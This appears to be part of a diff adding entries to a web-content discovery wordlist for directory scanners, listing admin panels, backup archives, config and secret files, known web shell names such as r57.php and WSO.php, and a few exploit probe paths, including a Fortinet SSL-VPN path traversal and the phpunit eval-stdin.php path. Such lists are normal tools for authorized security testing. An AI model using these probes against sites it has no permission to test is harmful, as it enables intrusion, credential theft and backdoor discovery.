+phpMyAdmin-2.5.6/
+phpMyAdmin-2.5.7-pl1/
+phpMyAdmin-2.5.7/
+phpMyAdmin-2.6.0-alpha/
+phpMyAdmin-2.6.0-alpha2/
+phpMyAdmin-2.6.0-beta1/
+phpMyAdmin-2.6.0-beta2/
+phpMyAdmin-2.6.0-pl1/
+phpMyAdmin-2.6.0-pl2/
+phpMyAdmin-2.6.0-pl3/
+phpMyAdmin-2.6.0-rc1/
+phpMyAdmin-2.6.0-rc2/
+phpMyAdmin-2.6.0-rc3/
+phpMyAdmin-2.6.0/
+phpMyAdmin-2.6.1-pl1/
+phpMyAdmin-2.6.1-pl2/
+phpMyAdmin-2.6.1-pl3/
+phpMyAdmin-2.6.1-rc1/
+phpMyAdmin-2.6.1-rc2/
+phpMyAdmin-2.6.1/
+phpMyAdmin-2.6.2-beta1/
+phpMyAdmin-2.6.2-pl1/
+phpMyAdmin-2.6.2-rc1/
+phpMyAdmin-2.6.2/
+phpMyAdmin-2.6.3-pl1/
+phpMyAdmin-2.6.3-rc1/
+phpMyAdmin-2.6.3/
+phpMyAdmin-2.6.4-pl1/
+phpMyAdmin-2.6.4-pl2/
+phpMyAdmin-2.6.4-pl3/
+phpMyAdmin-2.6.4-pl4/
+phpMyAdmin-2.6.4-rc1/
+phpMyAdmin-2.6.4/
+phpMyAdmin-2.7.0-beta1/
+phpMyAdmin-2.7.0-pl1/
+phpMyAdmin-2.7.0-pl2/
+phpMyAdmin-2.7.0-rc1/
+phpMyAdmin-2.7.0/
+phpMyAdmin-2.8.0-beta1/
+phpMyAdmin-2.8.0-rc1/
+phpMyAdmin-2.8.0-rc2/
+phpMyAdmin-2.8.0.1/
+phpMyAdmin-2.8.0.2/
+phpMyAdmin-2.8.0.3/
+phpMyAdmin-2.8.0.4/
+phpMyAdmin-2.8.0/
+phpMyAdmin-2.8.1-rc1/
+phpMyAdmin-2.8.1/
+phpMyAdmin-2.8.2/
+phpMyAdmin-2/
+phpMyAdmin-3.0.0/
+phpMyAdmin-3.0.1/
+phpMyAdmin-3.1.0/
+phpMyAdmin-3.1.1/
+phpMyAdmin-3.1.2/
+phpMyAdmin-3.1.3/
+phpMyAdmin-3.1.4/
+phpMyAdmin-3.1.5/
+phpMyAdmin-3.2.0/
+phpMyAdmin-3.2.1/
+phpMyAdmin-3.2.2/
+phpMyAdmin-3.2.3/
+phpMyAdmin-3.2.4/
+phpMyAdmin-3.2.5/
+phpMyAdmin-3.3.0/
+phpMyAdmin-3.3.1/
+phpMyAdmin-3.3.2-rc1/
+phpMyAdmin-3.3.2/
+phpMyAdmin-3.3.3-rc1/
+phpMyAdmin-3.3.3/
+phpMyAdmin-3.3.4-rc1/
+phpMyAdmin-3.3.4/
+phpMyAdmin-3/
+phpMyAdmin-4/
+phpmyadmin-old/index.php
+phpMyAdmin.old/index.php
+phpMyAdmin/
+phpMyadmin/
+phpmyAdmin/
+phpmyadmin/
+phpMyAdmin/index.php
+phpmyadmin/index.php
+phpMyAdmin/phpMyAdmin/index.php
+phpmyadmin/phpmyadmin/index.php
+phpMyAdmin/scripts/setup.php
+phpmyadmin/scripts/setup.php
+phpMyAdmin0/
+phpmyadmin0/
+phpmyadmin0/index.php
+phpMyAdmin1/
+phpmyadmin1/
+phpmyadmin1/index.php
+phpMyAdmin2/
+phpmyadmin2/
+phpmyadmin2/index.php
+phpmyadmin2011/
+phpmyadmin2012/
+phpmyadmin2013/
+phpmyadmin2014/
+phpmyadmin2015/
+phpmyadmin2016/
+phpmyadmin2017/
+phpmyadmin2018/
+phpMyAdmin3/
+phpmyadmin3/
+phpMyAdmin4/
+phpmyadmin4/
+phpMyadmin_bak/index.php
+phpMyAdminBackup/
+phpMyAdminold/index.php
+phpMyAds/
+phppgadmin
+phpPgAdmin/
+phppgadmin/
+phppma/
+phpRedisAdmin/
+phpredmin/
+phproad/
+phpsecinfo/
+phpspec.yml
+phpSQLiteAdmin/
+phpstudy.php
+phpsysinfo/
+phptest.php
+phpThumb.php
+phpThumb/
+phpunit.phar
+phpunit.xml
+phpunit.xml.dist
+phymyadmin/
+pi.php
+pi.php5
+pids
+pinfo.php
+pip-delete-this-directory.txt
+pip-log.txt
+piwigo/
+piwigo/extensions/UserCollections/template/ZeroClipboard.swf
+pkg/
+placeholder_one
+placeholder_two
+planning/cfg
+planning/docs
+planning/src
+platz_login/
+play-cache
+play-stash
+player.swf
+playground
+playground.xcworkspace
+plugin.xml
+plugins
+plugins.log
+plugins/
+plugins/editors/fckeditor
+plugins/fckeditor
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
+plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
+plugins/tiny_mce/
+plugins/tinymce/
+plugins/upload.php
+plugins/web.config
+plupload
+pm_to_blib
+pma-old/index.php
+PMA/
+pma/
+PMA/index.php
+pma/index.php
+pma/scripts/setup.php
+PMA2/index.php
+PMA2005/
+pma2005/
+PMA2009/
+pma2009/
+PMA2011/
+pma2011/
+PMA2012/
+pma2012/
+PMA2013/
+pma2013/
+PMA2014/
+pma2014/
+PMA2015/
+pma2015/
+PMA2016/
+pma2016/
+PMA2017/
+pma2017/
+PMA2018/
+pma2018/
+pma4/
+pmadmin/
+pmamy/index.php
+pmamy2/index.php
+pmd/index.php
+pmyadmin/
+pom.xml
+pom.xml.asc
+pom.xml.next
+pom.xml.releaseBackup
+pom.xml.tag
+pom.xml.versionsBackup
+portal/
+postgresql.conf
+power_user/
+powershell/
+pprof/
+printenv
+printenv.tmp
+priv8.php
+private.key
+private.mdb
+private.sqlite
+privatekey.key
+processlogin
+processlogin.php
+Procfile
+Procfile.dev
+Procfile.offline
+product.json
+productcockpit/
+production.log
+profiles
+profiles.xml
+program/
+proguard/
+project-admins/
+project.fragment.lock.json
+project.lock.json
+project.xml
+project/project
+project/target
+prometheus
+prometheus/
+prometheus/targets
+propel.ini
+propel.json
+protected/data/
+protected/runtime/
+providers.json
+proxy.pac
+proxy.stream?origin=https://google.com
+proxy/
+proxy_config.json
+prv/
+PSUser/
+public
+public..
+public/
+public/hot
+public/storage
+public/system
+public_html.zip
+public_html/
+publication_list.xml
+publish/
+PublishScripts/
+pubspec.lock
+puppet/
+pureadmin/
+putty.reg
+pw.txt
+pwd.db
+pws.txt
+py-compile
+qa/
+qq.php
+qql/
+qsd-php-backdoor.php
+query.log
+QuickLook/
+quikstore.cfg
+r.php
+r00t.php
+r57.php
+r57eng.php
+r57shell.php
+r58.php
+r99.php
+rabbitmq/
+radius/
+radmind-1/
+radmind/
+rails/info/properties
+Rakefile
+raygun/
+rcf/
+rcjakar/
+rcjakar/admin/login.php
+rcLogin/
+rdoc/
+reach/sip.svc
+Read
+Read%20Me.txt
+read.me
+Read_Me.txt
+README
+ReadMe
+Readme
+readme
+README.htm
+README.HTML
+README.html
+ReadMe.html
+Readme.html
+readme.html
+README.MD
+README.md
+ReadMe.md
+Readme.md
+readme.md
+README.mkd
+readme.mkd
+readme.php
+README.TXT
+README.txt
+ReadMe.txt
+Readme.txt
+readme.txt
+recentservers.xml
+redis/
+redmine/
+refresh
+refresh.json
+register.php
+registration/
+registry/
+rel/example_project
+release.properties
+RELEASE_NOTES.txt
+relogin
+relogin.htm
+relogin.html
+relogin.php
+remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd
+remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
+repo/
+request.log
+requesthandler/
+requesthandlerext/
+requirements.txt
+rerun.txt
+reseller
+resources.xml
+resources/
+resources/.arch-internal-preview.css
+resources/fckeditor
+resources/sass/.sass-cache/
+resources/tmp/
+rest-api/
+rest-auth/
+rest/
+rest/v1
+rest/v3/doc
+restart
+restart.json
+restore.php
+restricted
+resume
+resume.json
+revision.inc
+revision.txt
+rgs/
+rgsclients/
+robot.txt
+robots.txt
+robots.txt.dist
+root/
+RootCA.crt
+roundcube/index.php
+rpc/
+rpcwithcert/
+rsconnect/
+rst.php
+rudder/
+run.sh
+run.zip
+RushSite.xml
+s.php
+sa.php
+sa2.php
+sales.csv
+sales.log
+sales.sql
+sales.sql.gz
+sales.txt
+sales.xls
+salesforce.schema
+saltstack/
+sample.txt
+sample.txt~
+Saved/
+sbt/
+scalyr/
+scheduledtasks
+scheduler/
+schema.sql
+schema.yml
+script.zip
+script/
+script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+scripts
+scripts.zip
+scripts/
+scripts/ckeditor/ckfinder/core/connector/asp/connector.asp
+scripts/ckeditor/ckfinder/core/connector/aspx/connector.aspx
+scripts/ckeditor/ckfinder/core/connector/php/connector.php
+scripts/setup.php
+sdb.php
+sdist/
+searchreplacedb2.php
+searchreplacedb2cli.php
+secret
+Secret/
+secret/
+secrets.env
+secrets/
+secring.bak
+secring.pgp
+secring.skr
+secure/
+security/
+selenium/
+sendgrid.env
+sensu/
+sentemails.log
+sentry/
+serv-u.ini
+Server
+server-info
+server-status
+server-status/
+server.cert
+server.cfg
+server.config.yaml
+server.js
+server.key
+server.log
+server.ovpn
+Server.php
+server.pid
+server.xml
+Server/
+server/config.json
+server/server.js
+server_admin_small/
+server_stats
+ServerAdministrator/
+ServerList.cfg
+ServerList.xml
+servers.xml
+serverStatus.log
+service-registry/instance-status
+service-registry/instance-status.json
+service.asmx
+service.yaml
+serviceaccount.crt
+ServiceFabricBackup/
+services
+services/
+services/config/databases.yml
+servlet/
+servlet/%C0%AE%C0%AE%C0%AF
+servlet/DMSDump
+servlet/Oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+servlet/Oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+servlet/SnoopServlet
+servlet/Spy
+session/
+sessions
+sessions/
+settings.php
+settings.php.bak
+settings.php.dist
+settings.php.old
+settings.php.save
+settings.php.swp
+settings.php.txt
+settings.php~
+settings.py
+settings.xml
+settings/
+Settings/ui.plist
+setup
+setup.data
+setup.log
+setup.php
+setup.sql
+setup/
+sftp-config.json
+Sh3ll.php
+sheep.php
+shell.php
+shell.sh
+shell/
+shellz.php
+shopdb/
+show
+showcode.asp
+showlogin/
+shutdown
+sidekiq
+sidekiq_monitor
+sign-in
+sign-in/
+sign_in
+sign_in/
+signin
+signin.php
+signin/
+signup.action
+simple-backdoor.php
+simpleLogin/
+sip/
+site
+site.rar
+site.sql
+site.tar
+site.tar.bz2
+site.tar.gz
+site.txt
+site.zip
+site/
+site/common.xml
+site_admin
+siteadmin
+siteadmin.php
+siteadmin/
+siteadmin/index.php
+siteadmin/login.html
+siteadmin/login.php
+sitemanager.xml
+sites.ini
+sites.xml
+sites/all/libraries/README.txt
+sites/all/modules/README.txt
+sites/all/themes/README.txt
+sites/default/private/files/backup_migrate/scheduled/test.txt
+sites/example.sites.php
+sites/README.txt
+sized/
+slapd.conf
+smblogin/
+snoop.jsp
+snort/
+soap/
+soap/servlet/soaprouter
+soap/servlet/Spy
+soapdocs/
+soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+soapserver/
+sonar/
+sonarcube/
+sonarqube/
+source
+source.php
+source.zip
+source/
+source/inspector.html
+source_gen
+source_gen.caches
+SourceArt/
+spamlog.log
+spec/
+spec/examples.txt
+spec/lib/database.yml
+spec/lib/settings.local.yml
+spec/reports/
+spec/tmp
+splunk/
+spwd.db
+spy.aspx
+sql-admin/
+sql.inc
+sql.php
+sql.sql
+sql.tar
+sql.tar.bz2
+sql.tar.gz
+sql.tgz
+sql.txt
+sql.zip
+sql/
+sql/index.php
+sql/myadmin/
+sql/php-myadmin/
+sql/phpmanager/
+sql/phpmy-admin/
+sql/phpMyAdmin/
+sql/phpMyAdmin2/
+sql/phpmyadmin2/
+sql/sql-admin/
+sql/sql/
+sql/sqladmin/
+sql/sqlweb/
+sql/webadmin/
+sql/webdb/
+sql/websql/
+sql_dumps
+sql_error.log
+sqladm
+sqladmin
+sqladmin/
+sqlbuddy
+sqlbuddy/
+sqlbuddy/login.php
+sqldump.sql
+sqlmanager/
+sqlmigrate.php
+sqlnet.log
+sqlweb/
+SQLyogTunnel.php
+SqueakDebug.log
+squid-reports/
+squid/
+squid3_log/
+src/
+src/app.js
+src/index.js
+src/server.js
+srv/
+srv_gen/
+ss_vms_admin_sm/
+ssh/
+sshadmin/
+ssl/
+st.php
+stackstorm/
+stacktrace.log
+staff/
+stage_create_service.sh
+stage_create_service_dev.sh
+stage_create_service_prod.sh
+stage_deploy.sh
+stage_deploy_dev.sh
+stage_deploy_prod.sh
+stamp-h1
+staradmin/
+start.html
+start.sh
+startServer.log
+startup.cfg
+startup.sh
+stas/
+stash/
+stat/
+static..
+static/dump.sql
+statistics
+statistics/
+stats
+stats/
+statsd/
+status.php
+status.xsl
+status/
+status?full=true
+statusicon/
+storage/
+storage/logs/laravel.log
+store.tgz
+StreamingStatistics
+stronghold-info
+stronghold-status
+stssys.htm
+StyleCopReport.xml
+stylesheets/bundles
+sub-login/
+subversion/
+sugarcrm.log
+supe.php
+super
+Super-Admin/
+super.php
+super1
+super1/
+super_inde.php
+super_index
+super_logi.php
+super_login
+superma.php
+superman
+superman/
+supermanage.php
+supermanager
+superuse.php
+superuser
+superuser.php
+superuser/
+supervise/
+supervise/Logi.php
+supervise/Login
+supervisor/
+supervisord/
+support/
+support_login/
+surgemail/
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf
+surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf
+suspended.page
+svn.revision
+SVN/
+svn/
+svn/wc.db
+swagger
+swagger-resources
+swagger-ui
+swagger-ui.html
+swagger.json
+swagger.yaml
+swagger/index.html
+swagger/swagger-ui.htm
+swagger/swagger-ui.html
+swagger/ui
+swagger/v1/swagger.json
+swaggerui
+swfobject.js
+swfupload
+swfupload.swf
+sxd/
+sxd/backup/
+sxdpro/
+Sym.php
+sYm.php
+sym/
+sym/root/home/
+symfony/
+symfony/apps/frontend/config/routing.yml
+symfony/apps/frontend/config/settings.yml
+symfony/config/databases.yml
+Symlink.php
+Symlink.pl
+symphony/
+symphony/apps/frontend/config/app.yml
+symphony/apps/frontend/config/databases.yml
+symphony/config/app.yml
+symphony/config/databases.yml
+syncNode.log
+sypex.php
+sypexdumper.php
+SypexDumper_2011/
+sys-admin/
+sys/pprof
+sysadm
+sysadm.php
+sysadm/
+sysadmin
+sysadmin.php
+SysAdmin/
+sysadmin/
+SysAdmin2/
+sysadmins
+sysadmins/
+sysbackup
+sysinfo.txt
+syslog/
+system-administration/
+system.log
+system.zip
+system/
+system/cache/
+system/cron/cron.txt
+system/error.txt
+system/expressionengine/config/config.php
+system/expressionengine/config/database.php
+system/log/
+system/logs/
+system/storage/
+system_administration/
+SystemErr.log
+SystemOut.log
+t00.php
+tags
+tar
+tar.bz2
+tar.gz
+tar.php
+target
+target/
+tasks/
+tconn.conf
+team/
+technico.txt
+telephone
+telphin.log
+temp-testng-customsuite.xml
+temp.php
+temp.sql
+TEMP/
+temp/
+template/
+templates/
+templates/beez/index.php
+templates/beez3/
+templates/index.html
+templates/ja-helio-farsi/index.php
+templates/protostar/
+templates/rhuk_milkyway/index.php
+templates/system/
+templates_c/
+teraform/
+test
+test-build/
+test-driver
+test-output/
+test-report/
+test-result
+test.asp
+test.aspx
+test.chm
+test.htm
+test.html
+test.jsp
+test.mdb
+test.php
+test.sqlite
+test.txt
+test/
+test/php/test.html
+test/reports
+test/ssi/test.shtml
+test/tmp/
+test/version_tmp/
+test0.php
+test1
+test1.php
+test123.php
+test2
+test2.php
+test3.php
+test4.php
+test5.php
+test6.php
+test7.php
+test8.php
+test9.php
+test_
+test_gen
+test_gen.caches
+test_ip.php
+testfile.php
+Testing
+testproxy.php
+TestResult.xml
+tests
+tests/
+tests/phpunit_report.xml
+texinfo.tex
+textpattern/
+themes
+themes/
+themes/default/htdocs/flash/ZeroClipboard.swf
+Thorfile
+threaddump
+Thumbs.db
+thumbs.db
+thumbs/
+tikiwiki
+timeline.xctimeline
+tiny_mce/
+tiny_mce/plugins/filemanager/examples.html
+tiny_mce/plugins/imagemanager/pages/im/index.html
+tinyfilemanager-2.0.1/
+tinyfilemanager-2.0.2/
+tinyfilemanager-2.2.0/
+tinyfilemanager-2.3/
+tinyfilemanager.php
+tinyfilemanager/
+tinymce
+tinymce/
+TMP
+tmp
+tmp.php
+tmp/
+tmp/2.php
+tmp/access.log
+tmp/access_log
+tmp/admin.php
+tmp/cache/models/
+tmp/cache/persistent/
+tmp/cache/views/
+tmp/cgi.pl
+tmp/Cgishell.pl
+tmp/changeall.php
+tmp/cpn.php
+tmp/d.php
+tmp/d0maine.php
+tmp/domaine.php
+tmp/domaine.pl
+tmp/dz.php
+tmp/dz1.php
+tmp/error.log
+tmp/error_log
+tmp/index.php
+tmp/killer.php
+tmp/L3b.php
+tmp/madspotshell.php
+tmp/nanoc/
+tmp/priv8.php
+tmp/root.php
+tmp/sessions/
+tmp/sql.php
+tmp/Sym.php
+tmp/tests/
+tmp/up.php
+tmp/upload.php
+tmp/uploads.php
+tmp/user.php
+tmp/vaga.php
+tmp/whmcs.php
+tmp/xd.php
+TODO
+token.json
+tokenlite.zip
+tomcat-docs/appdev/sample/web/hello.jsp
+tomcat/axis/
+tools
+tools.php
+tools/
+tools/_backups/
+tools/phpMyAdmin/index.php
+trace
+Trace.axd
+Trace.axd::$DATA
+trace.json
+translate.sql
+transmission/web/
+tresearch/
+tresearch/happyaxis.jsp
+tripwire/
+trivia/
+tsconfig.json
+tst
+twitter/.env
+txt/
+typings/
+typo3
+typo3/
+typo3/phpmyadmin/
+typo3/phpmyadmin/index.php
+typo3/phpmyadmin/scripts/setup.php
+typo3_src
+typo3conf/AdditionalConfiguration.php
+typo3conf/temp_fieldInfo.php
+typo3temp/
+uber/
+uber/phpMemcachedAdmin/
+uber/phpMyAdmin/
+uber/phpMyAdminBackup/
+ucwa/
+uddi
+uddiexplorer
+ui
+ui/
+unattend.txt
+unifiedmessaging/
+up.php
+update
+update.php
+UPDATE.txt
+updates
+upfile.php
+UPGRADE
+upgrade.php
+upgrade.readme
+UPGRADE.txt
+UpgradeLog.XML
+upguard/
+upl.php
+Upload
+upload
+upload.asp
+upload.aspx
+upload.cfm
+upload.htm
+upload.html
+upload.php
+upload.php3
+upload.shtm
+upload.zip
+upload/
+upload/1.php
+upload/2.php
+upload/b_user.csv
+upload/b_user.xls
+upload/loginIxje.php
+upload/test.php
+upload/test.txt
+upload/upload.php
+upload2.php
+upload_backup/
+upload_file.php
+uploaded/
+uploader.php
+uploader/
+uploadfile.asp
+uploadfile.php
+uploadfiles.php
+uploadify.php
+uploadify/
+uploads.php
+uploads.zip
+uploads/
+uploads/dump.sql
+upstream_conf
+ur-admin
+ur-admin.php
+ur-admin/
+usage/
+user
+user.asp
+user.html
+user.php
+user.txt
+user/
+user/admin
+user/admin.php
+user_guide
+user_guide_src/build/
+user_guide_src/cilexer/build/
+user_guide_src/cilexer/dist/
+user_guide_src/cilexer/pycilexer.egg-info/
+user_uploads
+useradmin
+useradmin/
+userdb
+UserFile
+UserFiles
+userfiles
+userlogin
+userlogin.php
+UserLogin/
+usernames.txt
+users
+users.csv
+users.db
+users.ini
+users.json
+users.log
+users.mdb
+users.php
+users.sql
+users.sql.gz
+users.sqlite
+users.txt
+users.xls
+users/
+users/admin
+users/admin.php
+usr/
+usuario/
+usuarios/
+usuarios/login.php
+utility_login/
+uvpanel/
+uwsgi.ini
+v1
+v1.0
+v1.1
+v1.zip
+v1/
+v1/graphiql
+v1/graphql
+v1/playground
+v1/public/yql
+v1/test/js/console.html
+v1/test/js/console_ajax.js
+v2
+v2.0
+v2.zip
+v2/
+v2/_catalog
+v2/graphiql
+v2/graphql
+v2/keys/?recursive=true
+v2/playground
+v3
+v3/graphiql
+v3/graphql
+v3/playground
+vadmind/
+vagrant-spec.config.rb
+vagrant/
+Vagrantfile
+Vagrantfile.backup
+validator.php
+var/
+var/backups/
+var/bootstrap.php.cache
+var/cache/
+var/log
+var/log/
+var/log/authorizenet.log
+var/log/exception.log
+var/log/librepag.log
+var/log/old
+var/log/payment.log
+var/log/payment_authorizenet.log
+var/log/payment_paypal_express.log
+var/logs/
+var/package/
+var/sessions/
+variant/
+vault/
+vb.rar
+vb.sql
+vb.zip
+vendor/
+vendor/assets/bower_components
+vendor/bundle
+vendor/composer/installed.json
+vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+vendors/
+venv.bak/
+venv/
+version
+VERSION.txt
+version.txt
+version/
+video-js.swf
+view-source
+view.php
+views
+vignettes/
+violations/
+vm
+vmailadmin/
+vorod
+vorod.php
+vorod/
+vorud
+vorud.php
+vorud/
+vpn/
+vqmod/checked.cache
+vqmod/logs/
+vqmod/mods.cache
+vqmod/vqcache/
+vtiger/
+vtigercrm/
+vtund.conf
+w.php
+wallet.dat
+wallet.json
+war/gwt_bree/
+war/WEB-INF/classes/
+war/WEB-INF/deploy/
+wc.php
+wcx_ftp.ini
+web-app/plugins
+web-app/WEB-INF/classes
+web-console/
+web-console/Invoker
+web-console/ServerInfo.jsp
+web-console/status?full=true
+WEB-INF./
+WEB-INF./web.xml
+WEB-INF/
+WEB-INF/config.xml
+WEB-INF/lib/_wl_cls_gen.jar
+WEB-INF/web.xml
+web-variables.env
+web.7z
+web.config
+web.config.bak
+web.config.bakup
+web.config.old
+web.config.temp
+web.config.tmp
+web.config.txt
+web.config::$DATA
+web.Debug.config
+web.rar
+web.Release.config
+web.sql
+web.tar
+web.tar.bz2
+web.tar.gz
+web.tgz
+web.xml
+web.zip
+web/
+web/bundles/
+web/phpMyAdmin/
+web/phpMyAdmin/index.php
+web/phpMyAdmin/scripts/setup.php
+web/scripts/setup.php
+web/uploads/
+webadmin
+webadmin.html
+webadmin.php
+webadmin/
+webadmin/admin.html
+webadmin/admin.php
+webadmin/index.html
+webadmin/index.php
+webadmin/login.html
+webadmin/login.php
+webalizer
+webapp/wm/runtime.jsp
+webdav.password
+webdav/
+webdav/index.html
+webdav/servlet/webdav/
+webdb/
+webgrind
+weblogs
+webmail/
+webmail/src/configtest.php
+webmaster
+webmaster.php
+webmaster/
+webmin/
+webpack.config.js
+webpack.mix.js
+website.git
+website.tar
+website.tar.bz2
+website.tar.gz
+website.zip
+websql/
+webstat
+webstat/
+webstats
+webstats.html
+webstats/
+webticket/
+webticket/webticketservice.svc
+weixiao.php
+well-known.zip
+wenzhang
+wget-log
+wheels/
+whmcs.php
+whmcs/
+whmcs/downloads/dz.php
+wiki/
+winscp.ini
+WinSCP.ini
+wizmysqladmin/
+wordpress.tar
+wordpress.tar.bz2
+wordpress.tar.gz
+wordpress.zip
+wordpress/
+wordpress/wp-login.php
+workspace.xml
+workspace/uploads/
+wp-admin/
+wp-admin/c99.php
+wp-admin/install.php
+wp-admin/setup-config.php
+wp-app.log
+wp-cli.yml
+wp-config-sample.php
+wp-config.inc
+wp-config.old
+wp-config.php
+wp-config.php.bak
+wp-config.php.dist
+wp-config.php.inc
+wp-config.php.old
+wp-config.php.save
+wp-config.php.swp
+wp-config.php.txt
+wp-config.php.zip
+wp-config.php~
+wp-content/
+wp-content/backup-db/
+wp-content/backups/
+wp-content/blogs.dir/
+wp-content/cache/
+wp-content/debug.log
+wp-content/mu-plugins/
+wp-content/plugins/adminer/inc/editor/index.php
+wp-content/plugins/count-per-day/js/yc/d00.php
+wp-content/plugins/hello.php
+wp-content/upgrade/
+wp-content/uploads/
+wp-content/uploads/dump.sql
+wp-content/uploads/file-manager/log.txt
+wp-includes/
+wp-includes/rss-functions.php
+wp-json/
+wp-json/wp/v2/users/
+wp-login.php
+wp-login/
+wp-register.php
+wp.php
+wp.rar/
+wp.zip
+wp/
+wp/wp-login.php
+wpad.dat
+ws.php
+WS_FTP.ini
+ws_ftp.ini
+WS_FTP.INI
+WS_FTP.LOG
+WS_FTP/
+WS_FTP/Sites/ws_ftp.ini
+wsadmin.traceout
+wsadmin.valout
+wsadminListener.out
+wshell.php
+wsman
+WSO.php
+wso.php
+wso2.5.1.php
+wso2.php
+wssgs/
+wssgs/happyaxis.jsp
+wstats
+wuwu11.php
+wvdial.conf
+www-error.log
+www-test/
+www.rar
+www.sql
+www.tar
+www.tar.bz2
+www.tar.gz
+www.tgz
+www.zip
+www/phpMyAdmin/index.php
+wwwboard/
+wwwboard/passwd.txt
+wwwlog
+wwwroot.7z
+wwwroot.rar
+wwwroot.sql
+wwwroot.tar
+wwwroot.tar.bz2
+wwwroot.tar.gz
+wwwroot.tgz
+wwwroot.zip
+wwwstat
+wwwstats.htm
+x.php
+xampp/
+xampp/phpmyadmin/
+xampp/phpmyadmin/index.php
+xampp/phpmyadmin/scripts/setup.php
+xcuserdata/
+xd.php
+xferlog
+xiaoma.php
+xlogin/
+xls/
+xml/
+xml/_common.xml
+xml/common.xml
+xmlrpc.php
+xmlrpc_server.php
+xphperrors.log
+xphpMyAdmin/
+xprober.php
+xshell.php
+xsl/
+xsl/_common.xsl
+xsl/common.xsl
+xslt/
+xsql/
+xsql/lib/XSQLConfig.xml
+xw.php
+xw1.php
+xx.php
+yaml.log
+yaml_cron.log
+yarn-debug.log
+yarn-error.log
+yarn.lock
+ylwrap
+yonetici
+yonetici.html
+yonetici.php
+yonetim
+yonetim.html
+yonetim.php
+yum.log
+zabbix/
+zebra.conf
+zehir.php
+zeroclipboard.swf
+zf_backend.php
+zimbra/
+zipkin/
+zone-h.php
+~/
+~admin/